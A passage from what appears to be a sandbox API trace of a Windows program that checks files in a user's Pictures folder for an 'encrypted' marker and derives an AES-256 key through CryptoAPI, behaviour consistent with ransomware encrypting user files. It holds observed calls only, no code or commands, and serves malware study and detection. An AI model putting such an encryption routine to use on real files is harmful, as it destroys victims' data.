lpString1="hX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ks-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mGDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dt6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pjw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jw\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ruf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uf9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jfh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fh14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="14ZE.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.004] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.004] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.004] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.004] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.004] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.004] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.004] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.004] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd4fc30, ftCreationTime.dwHighDateTime=0x1d5bef1, ftLastAccessTime.dwLowDateTime=0x2ece4750, ftLastAccessTime.dwHighDateTime=0x1d5bbab, ftLastWriteTime.dwLowDateTime=0x2ece4750, ftLastWriteTime.dwHighDateTime=0x1d5bbab, nFileSizeHigh=0x0, nFileSizeLow=0xfbf7, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Uruf9aJfh14ZE.gif", cAlternateFileName="URUF9A~1.GIF")) returned 0x7c2240 [0040.004] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.005] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.005] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.005] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.005] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.005] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.005] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.005] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.005] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.005] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.005] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.005] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.005] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.005] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.005] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.006] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.006] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0040.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.006] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0040.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.007] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.007] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.007] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.007] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.007] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.007] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.008] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.008] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.008] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.008] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.008] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.008] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.008] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.008] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.008] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.008] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.008] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.008] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.009] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.009] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.009] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.009] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.009] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.009] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0040.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.009] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0040.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.010] CryptDestroyHash (hHash=0x7c2100) returned 1 [0040.010] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 